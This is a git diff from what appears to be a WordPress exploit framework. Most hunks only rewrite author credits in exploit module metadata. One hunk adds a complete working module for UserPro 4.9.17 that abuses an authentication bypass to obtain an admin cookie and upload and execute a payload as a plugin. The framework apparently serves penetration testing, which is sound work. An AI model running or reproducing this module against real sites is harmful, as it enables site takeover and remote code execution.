+++ b/modules/exploits/responsive_lightbox_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Responsive Lightbox <= 1.7.1 Reflected XSS Shell Upload',
       author: [
-        'Chris Liu',                      # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Chris Liu', # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8860'],
diff --git a/modules/exploits/revslider_shell_upload.rb b/modules/exploits/revslider_shell_upload.rb
index b429223..157d707 100644
--- a/modules/exploits/revslider_shell_upload.rb
+++ b/modules/exploits/revslider_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'allows unauthenticated users to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'Simo Ben youssef',               # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Simo Ben youssef', # Vulnerability discovery
+        'rastating'         # WPXF module
       ],
       references: [
         ['EDB', '35385'],
diff --git a/modules/exploits/rockhoist_badges_reflected_xss_shell_upload.rb b/modules/exploits/rockhoist_badges_reflected_xss_shell_upload.rb
index a6bb28a..84150f9 100644
--- a/modules/exploits/rockhoist_badges_reflected_xss_shell_upload.rb
+++ b/modules/exploits/rockhoist_badges_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Rockhoist Badges <= 1.2.2 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8763'],
diff --git a/modules/exploits/safe_editor_xss_shell_upload.rb b/modules/exploits/safe_editor_xss_shell_upload.rb
index f349118..7c5c681 100644
--- a/modules/exploits/safe_editor_xss_shell_upload.rb
+++ b/modules/exploits/safe_editor_xss_shell_upload.rb
@@ -15,8 +15,8 @@ def initialize
             'credentials to upload and execute a payload when an admin '\
             'views the page.',
       author: [
-        '@robsat91',                      # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        '@robsat91', # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8497']
diff --git a/modules/exploits/simpel_reserveren_reflected_xss_shell_upload.rb b/modules/exploits/simpel_reserveren_reflected_xss_shell_upload.rb
index b1602aa..311e361 100644
--- a/modules/exploits/simpel_reserveren_reflected_xss_shell_upload.rb
+++ b/modules/exploits/simpel_reserveren_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Simpel Reserveren <= 3.5.3 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8461'],
diff --git a/modules/exploits/simple_slideshow_manager_reflected_xss_shell_upload.rb b/modules/exploits/simple_slideshow_manager_reflected_xss_shell_upload.rb
index ba2b06f..5fc6d6e 100644
--- a/modules/exploits/simple_slideshow_manager_reflected_xss_shell_upload.rb
+++ b/modules/exploits/simple_slideshow_manager_reflected_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'Simple Slideshow Manager <= 2.3 Reflected XSS Shell Upload',
       author: [
-        'DefenseCode',                    # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'DefenseCode', # Discovery
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8841'],
diff --git a/modules/exploits/simplecart_shell_upload.rb b/modules/exploits/simplecart_shell_upload.rb
index 6842b7b..2838e53 100644
--- a/modules/exploits/simplecart_shell_upload.rb
+++ b/modules/exploits/simplecart_shell_upload.rb
@@ -17,8 +17,8 @@ def initialize
             'subsequently execute PHP scripts in the context of the '\
             'web server.',
       author: [
-        'Divya',                          # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Divya',     # Vulnerability disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['EDB', '36611']
diff --git a/modules/exploits/slideshow_gallery_reflected_xss_shell_upload.rb b/modules/exploits/slideshow_gallery_reflected_xss_shell_upload.rb
index d3a13d9..0d6c603 100644
--- a/modules/exploits/slideshow_gallery_reflected_xss_shell_upload.rb
+++ b/modules/exploits/slideshow_gallery_reflected_xss_shell_upload.rb
@@ -10,7 +10,7 @@ def initialize
       name: 'Slideshow Gallery <= 1.6.5 Reflected XSS Shell Upload',
       author: [
         'DefenseCode <www.defensecode.com>', # Discovery
-        'Rob Carr <rob[at]rastating.com>'    # WPXF module
+        'rastating'                          # WPXF module
       ],
       references: [
         ['WPVDB', '8795'],
diff --git a/modules/exploits/social_pug_reflected_xss_shell_upload.rb b/modules/exploits/social_pug_reflected_xss_shell_upload.rb
index f3129ef..cbf24b4 100644
--- a/modules/exploits/social_pug_reflected_xss_shell_upload.rb
+++ b/modules/exploits/social_pug_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Social Share Buttons - Social Pug <= 1.2.5 Reflected XSS Shell Upload',
       author: [
-        'Tom Adams',                      # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Tom Adams', # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8692'],
diff --git a/modules/exploits/sp_project_document_manager_reflected_xss_shell_upload.rb b/modules/exploits/sp_project_document_manager_reflected_xss_shell_upload.rb
index c9dd12e..83d0438 100644
--- a/modules/exploits/sp_project_document_manager_reflected_xss_shell_upload.rb
+++ b/modules/exploits/sp_project_document_manager_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'SP Project & Document Manager <= 2.5.9.5 Reflected XSS Shell Upload',
       author: [
-        'Michael Helwig',                 # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Michael Helwig', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8409'],
diff --git a/modules/exploits/spamfree_reflected_xss_shell_upload.rb b/modules/exploits/spamfree_reflected_xss_shell_upload.rb
index 446f8af..a29467c 100644
--- a/modules/exploits/spamfree_reflected_xss_shell_upload.rb
+++ b/modules/exploits/spamfree_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP-SpamFree Anti-Spam Reflected XSS Shell Upload',
       author: [
-        'Radjnies Bhansingh',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Radjnies Bhansingh', # Disclosure
+        'rastating'           # WPXF module
       ],
       references: [
         ['WPVDB', '8752'],
diff --git a/modules/exploits/spiffy_calendar_reflected_xss_shell_upload.rb b/modules/exploits/spiffy_calendar_reflected_xss_shell_upload.rb
index 5ad7437..22fe050 100644
--- a/modules/exploits/spiffy_calendar_reflected_xss_shell_upload.rb
+++ b/modules/exploits/spiffy_calendar_reflected_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'Spiffy Calendar <= 3.2.0 Reflected XSS Shell Upload',
       author: [
-        'DTSA',                           # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'DTSA',      # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8842'],
diff --git a/modules/exploits/symposium_shell_upload.rb b/modules/exploits/symposium_shell_upload.rb
index 281466c..60c0c8b 100644
--- a/modules/exploits/symposium_shell_upload.rb
+++ b/modules/exploits/symposium_shell_upload.rb
@@ -18,8 +18,8 @@ def initialize
             'file will allow the attacker to execute the script with the '\
             'privileges of the web server.',
       author: [
-        'Claudio Viviani',                # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Claudio Viviani', # Vulnerability disclosure
+        'rastating'        # WPXF module
       ],
       references: [
         ['WPVDB', '7716']
diff --git a/modules/exploits/tevolution_shell_upload.rb b/modules/exploits/tevolution_shell_upload.rb
index e774b26..76b7181 100644
--- a/modules/exploits/tevolution_shell_upload.rb
+++ b/modules/exploits/tevolution_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Tevolution < 2.3.0 Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8482'],
diff --git a/modules/exploits/tidio_gallery_reflected_xss_shell_upload.rb b/modules/exploits/tidio_gallery_reflected_xss_shell_upload.rb
index 50acabe..45daf9b 100644
--- a/modules/exploits/tidio_gallery_reflected_xss_shell_upload.rb
+++ b/modules/exploits/tidio_gallery_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Tidio Gallery <= 1.1 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8444'],
diff --git a/modules/exploits/tracking_code_manager_reflected_xss_shell_upload.rb b/modules/exploits/tracking_code_manager_reflected_xss_shell_upload.rb
index 25614fb..9ed7abd 100644
--- a/modules/exploits/tracking_code_manager_reflected_xss_shell_upload.rb
+++ b/modules/exploits/tracking_code_manager_reflected_xss_shell_upload.rb
@@ -10,7 +10,7 @@ def initialize
       name: 'Tracking Code Manager <= 1.11.1 Reflected XSS Shell Upload',
       author: [
         'DefenseCode <www.defensecode.com>', # Discovery
-        'Rob Carr <rob[at]rastating.com>'    # WPXF module
+        'rastating'                          # WPXF module
       ],
       references: [
         ['WPVDB', '8813'],
diff --git a/modules/exploits/tribulant_newsletter_reflected_xss_shell_upload.rb b/modules/exploits/tribulant_newsletter_reflected_xss_shell_upload.rb
index 4f60538..5e0f034 100644
--- a/modules/exploits/tribulant_newsletter_reflected_xss_shell_upload.rb
+++ b/modules/exploits/tribulant_newsletter_reflected_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'Tribulant Newsletters <= 4.6.4.2 Reflected XSS Shell Upload',
       author: [
-        'DefenseCode',                    # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'DefenseCode', # Discovery
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8839'],
diff --git a/modules/exploits/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb b/modules/exploits/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb
index 45c2114..44af33b 100644
--- a/modules/exploits/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb
+++ b/modules/exploits/tribulant_slideshow_gallery_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Tribulant Slideshow Gallery <= 1.6.4 Reflected XSS Shell Upload',
       author: [
-        'Spyros Gasteratos',              # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Spyros Gasteratos', # Discovery
+        'rastating'          # WPXF module
       ],
       references: [
         ['WPVDB', '8786'],
diff --git a/modules/exploits/trust_form_reflected_xss_shell_upload.rb b/modules/exploits/trust_form_reflected_xss_shell_upload.rb
index 197167d..756d98b 100644
--- a/modules/exploits/trust_form_reflected_xss_shell_upload.rb
+++ b/modules/exploits/trust_form_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Trust Form <= 2.0 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8755'],
diff --git a/modules/exploits/ultimate_addons_for_vc_authenticated_stored_xss_shell_upload.rb b/modules/exploits/ultimate_addons_for_vc_authenticated_stored_xss_shell_upload.rb
index 554186a..cd7a718 100644
--- a/modules/exploits/ultimate_addons_for_vc_authenticated_stored_xss_shell_upload.rb
+++ b/modules/exploits/ultimate_addons_for_vc_authenticated_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Ultimate Addons for Visual Composer <= 3.16.11 Authenticated Stored XSS Shell Upload',
       author: [
-        'WpHutte',                        # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'WpHutte',   # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8821'],
diff --git a/modules/exploits/ultimate_addons_for_vc_reflected_stored_xss_shell_upload.rb b/modules/exploits/ultimate_addons_for_vc_reflected_stored_xss_shell_upload.rb
index 2edf21b..0e30495 100644
--- a/modules/exploits/ultimate_addons_for_vc_reflected_stored_xss_shell_upload.rb
+++ b/modules/exploits/ultimate_addons_for_vc_reflected_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Ultimate Addons for Visual Composer <= 3.16.11 Reflected XSS Shell Upload',
       author: [
-        'WpHutte',                        # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'WpHutte',   # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8821'],
diff --git a/modules/exploits/ultimate_csv_importer_reflected_xss_shell_upload.rb b/modules/exploits/ultimate_csv_importer_reflected_xss_shell_upload.rb
index 870a6d0..2f63eb0 100644
--- a/modules/exploits/ultimate_csv_importer_reflected_xss_shell_upload.rb
+++ b/modules/exploits/ultimate_csv_importer_reflected_xss_shell_upload.rb
@@ -14,8 +14,8 @@ def initialize
             'a new admin user which will be used to upload and execute the '\
             'selected payload in the context of the web server.',
       author: [
-        'Rahul Pratap Singh',             # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Rahul Pratap Singh', # Discovery and disclosure
+        'rastating'           # WPXF module
       ],
       references: [
         ['WPVDB', '8368'],
diff --git a/modules/exploits/ultimate_form_builder_lite_reflected_xss_shell_upload.rb b/modules/exploits/ultimate_form_builder_lite_reflected_xss_shell_upload.rb
index 60d9c86..c3deb30 100644
--- a/modules/exploits/ultimate_form_builder_lite_reflected_xss_shell_upload.rb
+++ b/modules/exploits/ultimate_form_builder_lite_reflected_xss_shell_upload.rb
@@ -10,7 +10,7 @@ def initialize
       name: 'Ultimate Form Builder Lite <= 1.3.2 Reflected XSS Shell Upload',
       author: [
         'DefenseCode <www.defensecode.com>', # Discovery
-        'Rob Carr <rob[at]rastating.com>'    # WPXF module
+        'rastating'                          # WPXF module
       ],
       references: [
         ['WPVDB', '8798'],
diff --git a/modules/exploits/ultimate_member_shell_upload.rb b/modules/exploits/ultimate_member_shell_upload.rb
index 2834b2a..3544ab4 100644
--- a/modules/exploits/ultimate_member_shell_upload.rb
+++ b/modules/exploits/ultimate_member_shell_upload.rb
@@ -16,8 +16,8 @@ def initialize
             'level, which will then be used to change the specified admin users\' password. '\
             'The compromised admin account will then be used to store and execute the payload.',
       author: [
-        'James Golovich',                 # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'James Golovich', # Discovery and disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8688'],
diff --git a/modules/exploits/ultimate_product_catalogue_shell_upload.rb b/modules/exploits/ultimate_product_catalogue_shell_upload.rb
index 1e7a371..202fe43 100644
--- a/modules/exploits/ultimate_product_catalogue_shell_upload.rb
+++ b/modules/exploits/ultimate_product_catalogue_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Ultimate Product Catalogue <= v3.1.1 Unauthenticated Shell Upload',
       author: [
-        'LUCA ERCOLI ',                   # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'LUCA ERCOLI ', # Discovery and disclosure
+        'rastating'     # WPXF module
       ],
       references: [
         ['WPVDB', '7939'],
diff --git a/modules/exploits/universal_analytics_authenticated_xss_shell_upload.rb b/modules/exploits/universal_analytics_authenticated_xss_shell_upload.rb
index 9024059..b4f6540 100644
--- a/modules/exploits/universal_analytics_authenticated_xss_shell_upload.rb
+++ b/modules/exploits/universal_analytics_authenticated_xss_shell_upload.rb
@@ -15,7 +15,7 @@ def initialize
             'credentials to upload and execute a payload when an admin '\
             'views the page.',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8381'],
diff --git a/modules/exploits/user_access_manager_reflected_xss_shell_upload.rb b/modules/exploits/user_access_manager_reflected_xss_shell_upload.rb
index b46e434..9618ff7 100644
--- a/modules/exploits/user_access_manager_reflected_xss_shell_upload.rb
+++ b/modules/exploits/user_access_manager_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'User Access Manager <= 2.0.0 Reflected XSS Shell Upload',
       author: [
-        'DefenseCode <www.defensecode.com>',      # Dislosure
-        'Paul Williams <phyushin[at]phyubox.com>' # WPXF module
+        'DefenseCode <www.defensecode.com>',       # Dislosure
+        'Paul Williams <phyushin[at]phyubox.com>'  # WPXF module
       ],
       references: [
         ['WPVDB', '8814'],
diff --git a/modules/exploits/user_login_log_authenticated_stored_xss_shell_upload.rb b/modules/exploits/user_login_log_authenticated_stored_xss_shell_upload.rb
index 9ea9dbc..fd8b77b 100644
--- a/modules/exploits/user_login_log_authenticated_stored_xss_shell_upload.rb
+++ b/modules/exploits/user_login_log_authenticated_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'User Login Log <= 2.2.2 Authenticated Stored XSS Shell Upload',
       author: [
-        'Axel Koolhaas',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Axel Koolhaas', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8751'],
diff --git a/modules/exploits/userpro_shell_upload.rb b/modules/exploits/userpro_shell_upload.rb
new file mode 100644
index 0000000..5ba6790
--- /dev/null
+++ b/modules/exploits/userpro_shell_upload.rb
@@ -0,0 +1,70 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::UserProShellUpload < Wpxf::Module
+  include Wpxf::WordPress::Login
+  include Wpxf::WordPress::Plugin
+  include Wpxf::Utility
+
+  def initialize
+    super
+
+    update_info(
+      name: 'UserPro <= 4.9.17 Shell Upload',
+      desc: %(
+        Prior to version 4.9.17.1, the UserPro plugin is vulnerable to
+        an authentication bypass if a user named "admin" exists. Using
+        this vulnerability, this module gains admin rights and uploads
+        a payload to the target in the form of a plugin.
+      ),
+      author: [
+        'Colette Chamberland', # Disclosure
+        'Iain Hadgraft',       # Disclosure
+        'rastating'            # WPXF Module
+      ],
+      date: 'Nov 11 2017'
+    )
+  end
+
+  def check
+    changelog = normalize_uri(wordpress_url_plugins, 'userpro', 'changelog.txt')
+    regex = /Version\s+([\d\.]+)\s+/
+    check_version_from_custom_file(changelog, regex, '4.9.17.1')
+  end
+
+  def fetch_admin_cookie
+    res = execute_get_request(
+      url: full_uri,
+      params: {
+        'up_auto_log' => 'true'
+      }
+    )
+
+    return nil unless valid_wordpress_cookie?(res.cookies.to_s)
+
+    res.cookies.each do |k, v|
+      return nil if k =~ /^wordpress.*/ && v == 'deleted'
+    end
+
+    res.cookies
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Acquiring admin cookie...'
+    cookie = fetch_admin_cookie
+    if cookie.nil?
+      emit_error 'Failed to acquire an admin cookie. A user named "admin" may not exist.'
+      return false
+    end
+
+    emit_info 'Uploading payload...'
+    res = wordpress_upload_and_execute_payload_plugin(
+      Text.rand_alpha(10),
+      Text.rand_alpha(10),
+      cookie
+    )
+
+    !res.nil?
+  end
+end
diff --git a/modules/exploits/w3_total_cache_reflected_xss_shell_upload.rb b/modules/exploits/w3_total_cache_reflected_xss_shell_upload.rb
index 9cd82be..32a88c1 100644
--- a/modules/exploits/w3_total_cache_reflected_xss_shell_upload.rb
+++ b/modules/exploits/w3_total_cache_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'W3 Total Cache <= 0.9.4.1 Reflected XSS Shell Upload',
       author: [
-        'Zerial',                         # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Zerial',    # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8625'],
diff --git a/modules/exploits/wang_guard_reflected_xss_shell_upload.rb b/modules/exploits/wang_guard_reflected_xss_shell_upload.rb
index 3e3b2a1..017414d 100644
--- a/modules/exploits/wang_guard_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wang_guard_reflected_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Wang Guard <= 1.7.2 Reflected XSS Shell Upload',
       author: [
-        'Paul Williams <phyushin[at]phyubox.com>' # WPXF module
+        'Paul Williams <phyushin[at]phyubox.com>'  # WPXF module
       ],
       references: [
         ['WPVDB', '8725'],
diff --git a/modules/exploits/webapp_builder_shell_upload.rb b/modules/exploits/webapp_builder_shell_upload.rb
index 11adcda..4baa5ee 100644
--- a/modules/exploits/webapp_builder_shell_upload.rb
+++ b/modules/exploits/webapp_builder_shell_upload.rb
@@ -7,8 +7,8 @@ def initialize
     update_info(
       name: 'Webapp Builder <= 2.0 Unauthenticated Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8773'],
diff --git a/modules/exploits/whizz_reflected_xss_shell_upload.rb b/modules/exploits/whizz_reflected_xss_shell_upload.rb
index 947e8fa..d588b00 100644
--- a/modules/exploits/whizz_reflected_xss_shell_upload.rb
+++ b/modules/exploits/whizz_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Whizz <= 1.0.7 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8459'],
diff --git a/modules/exploits/windows_desktop_and_iphone_photo_uploader_shell_upload.rb b/modules/exploits/windows_desktop_and_iphone_photo_uploader_shell_upload.rb
index ab433bb..028b8d8 100644
--- a/modules/exploits/windows_desktop_and_iphone_photo_uploader_shell_upload.rb
+++ b/modules/exploits/windows_desktop_and_iphone_photo_uploader_shell_upload.rb
@@ -10,7 +10,7 @@ def initialize
       name: 'Windows Desktop And iPhone Photo Uploader Unauthenticated Shell Upload',
       author: [
         'Manish Kishan Tanwar AKA error1046', # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>'     # WPXF module
+        'rastating'                           # WPXF module
       ],
       references: [
         ['WPVDB', '7893']
diff --git a/modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb b/modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb
index 7f70ee0..04bc78f 100644
--- a/modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb
+++ b/modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Woo Custom Checkout Field <= 1.3.2 XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
+        'rastating'  # Disclosure + WPXF module
       ],
       references: [
         ['WPVDB', '8567'],
diff --git a/modules/exploits/woo_email_control_reflected_xss_shell_upload.rb b/modules/exploits/woo_email_control_reflected_xss_shell_upload.rb
index 39db154..1907841 100644
--- a/modules/exploits/woo_email_control_reflected_xss_shell_upload.rb
+++ b/modules/exploits/woo_email_control_reflected_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Woo Email Control <= 1.01 Reflected XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
+        'rastating'  # Disclosure + WPXF module
       ],
       references: [
         ['WPVDB', '8559'],
diff --git a/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb b/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb
index 24ba432..5978c41 100644
--- a/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb
+++ b/modules/exploits/woocommerce_amazon_affiliates_v8_shell_upload.rb
@@ -23,8 +23,8 @@ def initialize
          - 501d0292aca8270d539662a5a9aad855
       ),
       author: [
-        'Evex_1337',                      # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Evex_1337', # Discovery and disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '7940']
diff --git a/modules/exploits/woocommerce_product_addons_shell_upload.rb b/modules/exploits/woocommerce_product_addons_shell_upload.rb
index d8a7e95..56b13f9 100644
--- a/modules/exploits/woocommerce_product_addons_shell_upload.rb
+++ b/modules/exploits/woocommerce_product_addons_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WooCommerce Product Addons <= 1.1 Unauthenticated Shell Upload',
       author: [
-        'White Fir Design',               # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Discovery and disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8630'],
diff --git a/modules/exploits/wordpress_firewall_reflected_xss_shell_upload.rb b/modules/exploits/wordpress_firewall_reflected_xss_shell_upload.rb
index 6c2bd2d..4dc91f1 100644
--- a/modules/exploits/wordpress_firewall_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wordpress_firewall_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WordPress Firewall 2 Reflected XSS Shell Upload',
       author: [
-        'Tom Adams',                      # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Tom Adams', # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8787'],
diff --git a/modules/exploits/work_the_flow_shell_upload.rb b/modules/exploits/work_the_flow_shell_upload.rb
index cd1e6d0..3df8f3b 100644
--- a/modules/exploits/work_the_flow_shell_upload.rb
+++ b/modules/exploits/work_the_flow_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'allows unauthenticated users to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'Claudio Viviani',                # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Claudio Viviani', # Vulnerability discovery
+        'rastating'        # WPXF module
       ],
       references: [
         ['WPVDB', '7883'],
diff --git a/modules/exploits/wp2android_shell_upload.rb b/modules/exploits/wp2android_shell_upload.rb
index 7e8d2c3..655a250 100644
--- a/modules/exploits/wp2android_shell_upload.rb
+++ b/modules/exploits/wp2android_shell_upload.rb
@@ -7,8 +7,8 @@ def initialize
     update_info(
       name: 'Wp2android <= 1.1.4 Unauthenticated Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8774'],
diff --git a/modules/exploits/wp_advanced_importer_reflected_xss_shell_upload.rb b/modules/exploits/wp_advanced_importer_reflected_xss_shell_upload.rb
index 5278f77..94ae3f2 100644
--- a/modules/exploits/wp_advanced_importer_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wp_advanced_importer_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Advanced Importer <= 2.1.1 Reflected XSS Shell Upload',
       author: [
-        'Rahul Pratap Singh',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Rahul Pratap Singh', # Disclosure
+        'rastating'           # WPXF module
       ],
       references: [
         ['WPVDB', '8396'],
diff --git a/modules/exploits/wp_filebase_download_manager_reflected_xss_shell_upload.rb b/modules/exploits/wp_filebase_download_manager_reflected_xss_shell_upload.rb
index b2d1562..69db539 100644
--- a/modules/exploits/wp_filebase_download_manager_reflected_xss_shell_upload.rb
+++ b/modules/exploits/wp_filebase_download_manager_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP-Filebase Download Manager <= 3.4.4 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8783'],
diff --git a/modules/exploits/wp_front_end_repository_manager_shell_upload.rb b/modules/exploits/wp_front_end_repository_manager_shell_upload.rb
index 111f299..7e7b1d4 100644
--- a/modules/exploits/wp_front_end_repository_manager_shell_upload.rb
+++ b/modules/exploits/wp_front_end_repository_manager_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Front End Repostiory Manager Unauthenticated Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8100'],
diff --git a/modules/exploits/wp_google_maps_stored_xss_shell_upload.rb b/modules/exploits/wp_google_maps_stored_xss_shell_upload.rb
index 2e902c0..e620c45 100644
--- a/modules/exploits/wp_google_maps_stored_xss_shell_upload.rb
+++ b/modules/exploits/wp_google_maps_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'WP Google Maps <= 6.3.14 Stored XSS Shell Upload',
       author: [
